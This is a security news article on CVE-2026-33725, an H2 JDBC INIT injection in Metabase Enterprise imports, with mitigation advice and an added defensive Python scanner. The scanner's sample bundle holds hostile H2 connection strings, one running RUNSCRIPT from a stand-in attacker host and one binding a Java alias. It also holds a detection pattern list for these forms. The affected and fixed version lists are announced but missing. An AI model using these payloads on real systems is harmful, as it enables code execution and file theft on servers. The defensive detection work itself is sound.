The flaw in Metabase Enterprise, tracked as CVE-2026-33725, enables remote code execution (RCE) and arbitrary file access on vulnerable systems.
With a public exploit now available, organizations running the data analytics platform are being warned to patch immediately.
The issue originates in how Metabase Enterprise handles serialization imports: the flaw is an H2 JDBC INIT injection.
H2's JDBC connection URL accepts an INIT setting whose value is SQL that the driver executes every time the connection opens, and H2's SQL dialect can load scripts from a file or a URL (RUNSCRIPT) and bind Java code as SQL functions (CREATE ALIAS). An INIT injection therefore means the import path hands an attacker-controlled connection string to the driver.
When Metabase processes a specially crafted import bundle, it executes the attacker's database instructions with the privileges of the Metabase process.
That is enough for full system compromise: running arbitrary code on the host, or reading sensitive files stored on it.
A rough analogy is a building's access system that, while onboarding new tenants, accepts a forged master key as part of their paperwork: the system trusts the input it is given, and the attacker walks away with unrestricted access.
Remote code execution vulnerabilities are rated among the most severe because a successful exploit gives the attacker control of the host running the application; in some cases, when the vulnerable path is reachable without credentials, no authentication is needed at all.
The vulnerability impacts multiple Metabase Enterprise release branches. Organizations running the following versions are at risk:
Any unpatched instance within these ranges is vulnerable to exploitation.
The PoC exploit was published on GitHub by security researcher Diego Tellaroli from Hakai Security.
The Python-based script automates the full attack chain required to exploit CVE-2026-33725, making it easier for attackers to replicate.
Although the repository includes an educational disclaimer, the public availability of such tools often accelerates real-world exploitation.
Threat actors can quickly adapt these scripts into automated attack campaigns targeting exposed Metabase instances.
Hakai Security, through its QuimeraX Intelligence platform, regularly discloses such vulnerabilities to promote faster remediation across organizations.
Administrators are strongly advised to patch affected systems immediately. Updated secure versions include:
Upgrading to one of these releases is the complete fix; the workarounds below only reduce exposure until the upgrade is done.
If immediate patching is not feasible, restrict access to the Metabase administration interface to trusted networks and administrators; treat import bundles from any source as untrusted input and reject database definitions whose H2 connection string carries an INIT clause; audit the H2 connections already configured in the instance for the same pattern; and monitor the application logs for serialization or import activity that does not match a planned change.
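The following Python script is an added example written for this article; it is not code from the page, from Hakai Security's PoC, or from Metabase. It turns two points above into a concrete check: the H2 INIT mechanism in the vulnerability description, and the advice to watch import and serialization activity. It scans text (an import bundle, an API request body, or log lines that echo connection details) for H2 JDBC URLs, splits out the INIT setting, and flags the SQL forms that H2 executes on connect. The sample input is constructed here; its `db:` key and YAML layout are assumptions about how a bundle might carry connection details, not a reproduction of Metabase's serialization format, and the statement list covers H2's own SQL (RUNSCRIPT, CREATE ALIAS, CREATE TRIGGER, CALL), not anything specific to this CVE.

```python
import re
from dataclasses import dataclass

# H2 JDBC URLs look like jdbc:h2:<database>;SETTING=VALUE;SETTING=VALUE.
# The INIT setting holds SQL that H2 runs every time the connection opens,
# which is exactly what an import path must never accept from an untrusted bundle.
H2_URL_RE = re.compile(r"jdbc:h2:[^\n]*", re.IGNORECASE)

# INIT statements that turn a connection string into code or file access.
# Each entry is (regex over the INIT SQL, label reported to the reviewer).
DANGEROUS_INIT = [
    (r"\bRUNSCRIPT\b", "RUNSCRIPT (runs SQL from a local file or a URL)"),
    (r"\bCREATE\s+(?:OR\s+REPLACE\s+)?ALIAS\b",
     "CREATE ALIAS (binds a Java method or source as a SQL function)"),
    (r"\bCREATE\s+TRIGGER\b", "CREATE TRIGGER (attaches Java code to table events)"),
    (r"\bCALL\b", "CALL (invokes a function, typically an alias just created)"),
]


@dataclass
class Finding:
    url: str
    init_sql: str
    reasons: list


def parse_h2_settings(url):
    """Split an H2 URL into (database, {SETTING: value}).
    H2 setting names are case-insensitive, so keys are upper-cased. A '\\;'
    inside a value is H2's escaped separator (used to chain INIT statements),
    so it is protected before splitting on ';' and restored afterwards."""
    body = url[len("jdbc:h2:"):].replace("\\;", "\x00")
    parts = body.split(";")
    settings = {}
    for part in parts[1:]:
        key, sep, value = part.partition("=")
        if sep:
            settings[key.strip().upper()] = value.replace("\x00", ";")
    return parts[0], settings


def scan_text(text):
    """Return a Finding for every H2 URL in text that carries an INIT clause.
    Matching is line-based; one trailing quote plus any trailing comma or
    whitespace belonging to the surrounding YAML or JSON is dropped."""
    findings = []
    for match in H2_URL_RE.finditer(text):
        url = match.group(0).rstrip(" ,")
        if url[-1:] in "\"'":
            url = url[:-1]
        _, settings = parse_h2_settings(url)
        init_sql = settings.get("INIT")
        if init_sql is None:
            continue
        reasons = [label for pattern, label in DANGEROUS_INIT
                   if re.search(pattern, init_sql, re.IGNORECASE)]
        findings.append(Finding(url, init_sql, reasons))
    return findings


def verdict(findings):
    """'block' when any INIT clause carries code or file access SQL,
    'review' when INIT is present but only looks like session setup,
    'clean' when no H2 URL in the input uses INIT at all."""
    if any(f.reasons for f in findings):
        return "block"
    return "review" if findings else "clean"


# Constructed sample: four database entries shaped like the details a
# serialization bundle might carry. The 'db' key and layout are assumed.
SAMPLE_BUNDLE = """\
name: Sample Warehouse
engine: h2
details:
  db: jdbc:h2:file:/metabase/data/warehouse
---
name: Looks Harmless
engine: h2
details:
  db: "jdbc:h2:mem:scratch;INIT=SET SCHEMA PUBLIC"
---
name: Remote Script
engine: h2
details:
  db: "jdbc:h2:mem:x;INIT=RUNSCRIPT FROM 'http://attacker.example/payload.sql'"
---
name: Java Alias
engine: h2
details:
  db: 'jdbc:h2:mem:y;INIT=CREATE ALIAS HOSTNAME FOR "java.net.InetAddress.getLocalHost"\\;CALL HOSTNAME()'
"""

if __name__ == "__main__":
    results = scan_text(SAMPLE_BUNDLE)
    for f in results:
        print(f"{'BLOCK ' if f.reasons else 'REVIEW'} {f.url}")
        for r in f.reasons:
            print(f"         {r}")
    print("verdict:", verdict(results))
```

Run it over a bundle before feeding the bundle to the import endpoint, and, since existing connections reuse the same driver, over an export of the H2 connections already configured in the instance. An INIT clause in a connection string that arrived through an import is suspicious even when its SQL looks benign, so the script reports those for review and reserves `block` for SQL that loads scripts or binds Java code.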
With a working exploit already circulating, delaying remediation could expose organizations to data breaches, system compromise, and potential lateral movement within enterprise environments.
The post PoC Exploit Released for Critical Metabase Enterprise RCE Vulnerability appeared first on Cyber Security News.